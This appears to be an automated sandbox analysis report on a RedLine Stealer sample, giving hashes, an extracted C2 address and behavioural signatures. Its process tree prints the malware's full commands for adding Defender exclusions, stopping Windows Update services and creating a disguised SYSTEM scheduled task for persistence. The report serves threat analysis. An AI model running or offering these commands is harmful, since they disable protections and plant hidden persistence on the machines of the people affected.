Analysis
- max time kernel: 150s
- max time network: 132s
- platform: windows10-1703_x64
- resource: win10-20230703-en
- resource tags: arch:x64, arch:x86, image:win10-20230703-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 15-08-2023 23:46
- Static task: static1
- Behavioral task: behavioral1
- Sample: 500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe
- Resource: win10-20230703-en
General
- Target: 500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe
- Size: 319KB
- MD5: bab76cbd731821d5b1324e1b51aebb0a
- SHA1: 4c6d0f9087576fe9a49817e91a556ad9d4f7bfe1
- SHA256: 500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71
- SHA512: 1f79942c84cc7453bd34ef148a72d72475509a913f86025d48d86e3bd340f621c678371ed4ae7828875a8fa4ee2578f61202c4683eeaffaefdaa50258051ef19
- SSDEEP: 6144:fZtvL7XGJX5GwKmkMlvsdL32Lb3HFQI7Bk49:fZ9nXGrGw/kNYfHFQI1b9
Malware Config
Extracted
- redline
- LogsDiller Cloud (TG: @logsdillabot)
- 51.83.170.21:19447
- auth_value: 3a050df92d0cf082b2cdaf87863616be
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description / pid / Process / procid_target
- PID 4656 created 3336 (pid 4656, setup.exe, procid_target 33)
- PID 4656 created 3336 (pid 4656, setup.exe, procid_target 33)
- PID 4656 created 3336 (pid 4656, setup.exe, procid_target 33)
- PID 4656 created 3336 (pid 4656, setup.exe, procid_target 33)
- PID 4656 created 3336 (pid 4656, setup.exe, procid_target 33)
- PID 4500 created 3336 (pid 4500, updater.exe, procid_target 33)
- PID 4500 created 3336 (pid 4500, updater.exe, procid_target 33)
- PID 4500 created 3336 (pid 4500, updater.exe, procid_target 33)
- PID 4500 created 3336 (pid 4500, updater.exe, procid_target 33)
Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs
description / ioc / Process
- File created C:\Windows\System32\drivers\etc\hosts (updater.exe)
- File created C:\Windows\System32\drivers\etc\hosts (setup.exe)
Stops running service(s) 3 TTPs

Executes dropped EXE 3 IoCs
pid / Process
- 4540 mi.exe
- 4656 setup.exe
- 4500 updater.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

resource / yara_rule
- behavioral1/files/0x000800000001af7c-172.dat themida
- behavioral1/files/0x000800000001af7c-171.dat themida
- behavioral1/memory/4656-173-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida
- behavioral1/memory/4656-174-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida
- behavioral1/memory/4656-176-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida
- behavioral1/memory/4656-177-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida
- behavioral1/memory/4656-178-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida
- behavioral1/memory/4656-179-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida
- behavioral1/memory/4656-180-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida
- behavioral1/memory/4656-181-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida
- behavioral1/files/0x000800000001af7e-279.dat themida
- behavioral1/memory/4656-280-0x00007FF643670000-0x00007FF6448D5000-memory.dmp themida
- behavioral1/files/0x000800000001af7e-282.dat themida
- behavioral1/memory/4500-283-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida
- behavioral1/memory/4500-285-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida
- behavioral1/memory/4500-286-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida
- behavioral1/memory/4500-287-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida
- behavioral1/memory/4500-288-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida
- behavioral1/memory/4500-289-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida
- behavioral1/memory/4500-290-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida
- behavioral1/memory/4500-291-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida
- behavioral1/memory/4500-464-0x00007FF7E8640000-0x00007FF7E98A5000-memory.dmp themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Drops file in System32 directory 2 IoCs
description / ioc / Process
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid / Process
- 4656 setup.exe
- 4500 updater.exe

Drops file in Program Files directory 1 IoCs
description / ioc / Process
- File created C:\Program Files\Google\Chrome\updater.exe (setup.exe)
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
pid / Process
- 3660, 2360, 376, 4360, 2892, 4844, 1676, 508, 3628, 208 (all sc.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Modifies data under HKEY_USERS 64 IoCs
Suspicious behavior: EnumeratesProcesses 33 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 41 IoCs
Processes
- [1] C:\Windows\Explorer.EXE (PID 3336)
  Command line: C:\Windows\Explorer.EXE
  - [2] C:\Users\Admin\AppData\Local\Temp\500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe (PID 2088)
    Command line: "C:\Users\Admin\AppData\Local\Temp\500074e9c612412e9908195b4e203501c4b2631bda3c26d2054e4045d6cf4a71.exe"
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\AppData\Local\Temp\mi.exe (PID 4540)
      Command line: "C:\Users\Admin\AppData\Local\Temp\mi.exe"
      Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Temp\setup.exe (PID 4656)
        Command line: "C:\Windows\Temp\setup.exe"
        Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in Drivers directory; Executes dropped EXE; Suspicious use of NtSetInformationThreadHideFromDebugger; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4516)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\System32\cmd.exe (PID 820)
    Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\sc.exe (PID 508)
      Command line: sc stop UsoSvc
      Signatures: Launches sc.exe
    - [3] C:\Windows\System32\sc.exe (PID 3628)
      Command line: sc stop WaaSMedicSvc
      Signatures: Launches sc.exe
    - [3] C:\Windows\System32\sc.exe (PID 208)
      Command line: sc stop wuauserv
      Signatures: Launches sc.exe
    - [3] C:\Windows\System32\sc.exe (PID 2892)
      Command line: sc stop bits
      Signatures: Launches sc.exe
    - [3] C:\Windows\System32\sc.exe (PID 2360)
      Command line: sc stop dosvc
      Signatures: Launches sc.exe
  - [2] C:\Windows\System32\cmd.exe (PID 4436)
    Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\powercfg.exe (PID 2084)
      Command line: powercfg /x -hibernate-timeout-ac 0
      Signatures: Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\powercfg.exe (PID 4580)
      Command line: powercfg /x -hibernate-timeout-dc 0
      Signatures: Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\powercfg.exe (PID 3512)
      Command line: powercfg /x -standby-timeout-ac 0
      Signatures: Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\powercfg.exe (PID 792)
      Command line: powercfg /x -standby-timeout-dc 0
      Signatures: Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4324)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\System32\schtasks.exe (PID 2248)
    Command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1436)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Signatures: Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
  - [2] C:\Windows\System32\cmd.exe (PID 4236)
    Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\sc.exe (PID 376)
      Command line: sc stop UsoSvc
      Signatures: Launches sc.exe
    - [3] C:\Windows\System32\sc.exe (PID 4360)
      Command line: sc stop WaaSMedicSvc
      Signatures: Launches sc.exe
    - [3] C:\Windows\System32\sc.exe (PID 4844)
      Command line: sc stop wuauserv
      Signatures: Launches sc.exe
    - [3] C:\Windows\System32\sc.exe (PID 1676)
      Command line: sc stop bits
      Signatures: Launches sc.exe
    - [3] C:\Windows\System32\sc.exe (PID 3660)
      Command line: sc stop dosvc
      Signatures: Launches sc.exe
  - [2] C:\Windows\System32\cmd.exe (PID 360)
    Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\powercfg.exe (PID 2528)
      Command line: powercfg /x -hibernate-timeout-ac 0
    - [3] C:\Windows\System32\powercfg.exe (PID 2596)
      Command line: powercfg /x -hibernate-timeout-dc 0
    - [3] C:\Windows\System32\powercfg.exe (PID 4228)
      Command line: powercfg /x -standby-timeout-ac 0
    - [3] C:\Windows\System32\powercfg.exe (PID 1948)
      Command line: powercfg /x -standby-timeout-dc 0
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 508)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    Signatures: Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
- [1] C:\Program Files\Google\Chrome\updater.exe (PID 4500)
  Command line: "C:\Program Files\Google\Chrome\updater.exe"
  Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in Drivers directory; Executes dropped EXE; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses